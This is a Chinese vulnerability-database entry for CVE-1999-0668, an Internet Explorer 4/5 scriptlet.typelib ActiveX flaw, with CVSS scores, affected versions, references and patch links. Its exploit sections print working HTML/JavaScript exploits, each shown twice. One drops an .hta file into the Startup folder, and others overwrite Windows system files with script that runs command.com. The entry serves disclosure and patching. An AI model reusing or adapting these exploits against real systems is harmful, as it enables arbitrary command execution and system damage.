CVE-1999-0668
CVSS5.1
发布时间 :1999-08-21 00:00:00
修订时间 :2008-09-09 00:00:00
NMCOES    

[原文]The scriptlet.typelib ActiveX control is marked as "safe for scripting" for Internet Explorer, which allows a remote attacker to execute arbitrary commands as demonstrated by Bubbleboy.


[CNNVD]Microsoft IE5 ActiveX "Object for constructing type libraries for scriptlets"漏洞(CNNVD-199908-043)

        Internet Explorer中标志为"safe for scripting"的scriptlet.typelib ActiveX控件存在漏洞。远程攻击者可以执行任意命令,如Bubbleboy。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:5.0Microsoft Internet Explorer 5.0
cpe:/a:microsoft:ie:4.0Microsoft Internet Explorer 4.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0668
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0668
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199908-043
(官方数据源) CNNVD

- 其它链接及资源

http://www.microsoft.com/technet/security/bulletin/ms99-032.asp
(PATCH)  MS  MS99-032
http://www.securityfocus.com/bid/598
(UNKNOWN)  BID  598
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q240308
(UNKNOWN)  MSKB  Q240308
http://ciac.llnl.gov/ciac/bulletins/j-064.shtml
(UNKNOWN)  CIAC  J-064

- 漏洞信息

Microsoft IE5 ActiveX "Object for constructing type libraries for scriptlets"漏洞
中危 边界条件错误
1999-08-21 00:00:00 2005-10-12 00:00:00
远程  
        Internet Explorer中标志为"safe for scripting"的scriptlet.typelib ActiveX控件存在漏洞。远程攻击者可以执行任意命令,如Bubbleboy。

- 公告与补丁

        Microsoft has released a patch:
        Windows 95/98:
        ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/Eyedog-fix/x86/q240308.exe
        Windows NT:
        ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/Eyedog-fix/

- 漏洞信息 (19468)

MS IE 5.0 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability (EDBID:19468)
windows remote
1999-08-21 Verified
0 Georgi Guninski
N/A [点击下载]
Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability

source: http://www.securityfocus.com/bid/598/info

The 'scriptlet.typlib' ActiveX control can create, edit, and overwrite files on the local disk. This means that an executable text file (e.g. a '.hta' file) can be written to the startup folder of a remote machine and will be executed the next time that machine reboots. Attackers can exploit this vulnerability via a malicious web page or an email message. 

Exploit by Georgi Guninski.
A working demo is available at:
http://www.nat.bg/~joro/scrtlb.html

<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski
http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

Exploit by Seth Georgion
A working demo is available at: http://www.sassproductions.com/hacked.htm

Windows 98:
<p>
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
></object><script>
scr.Reset();
scr.Path="C:\\windows\\system\\Krnl386.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p>

Windows NT:
<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14">
</object>
<script>
scr.Reset();
scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p> 		

- 漏洞信息

1054
Microsoft IE scriptlet.typelib ActiveX Arbitrary Command Execution
Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

1999-08-21 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft IE5 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability
Boundary Condition Error 598
Yes No
1999-08-21 12:00:00 2007-07-16 10:06:00
Posted to Bugtraq by Georgi Guninski <joro@NAT.BG> on August 21, 1999.

- 受影响的程序版本

Microsoft Internet Explorer 5.0 for Windows NT 4
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.0 for Windows 98
+ Microsoft Windows 98
+ Microsoft Windows 98
Microsoft Internet Explorer 5.0 for Windows 95
+ Microsoft Windows 95
+ Microsoft Windows 95

- 漏洞讨论

The 'scriptlet.typlib' ActiveX control can create, edit, and overwrite files on the local disk. This means that an executable text file (e.g. a '.hta' file) can be written to the startup folder of a remote machine and will be executed the next time that machine reboots. Attackers can exploit this vulnerability via a malicious web page or an email message.

- 漏洞利用

Exploit by Georgi Guninski.
A working demo is available at:
http://www.nat.bg/~joro/scrtlb.html

<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski
http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

Exploit by Seth Georgion
A working demo is available at: http://www.sassproductions.com/hacked.htm

Windows 98:
<p>
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
></object><script>
scr.Reset();
scr.Path="C:\\windows\\system\\Krnl386.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p>

Windows NT:
<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14">
</object>
<script>
scr.Reset();
scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p>

- 解决方案

Microsoft has released a patch:

Windows 95/98:
ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/Eyedog-fix/x86/q240308.exe

Windows NT:
ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/Eyedog-fix/

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站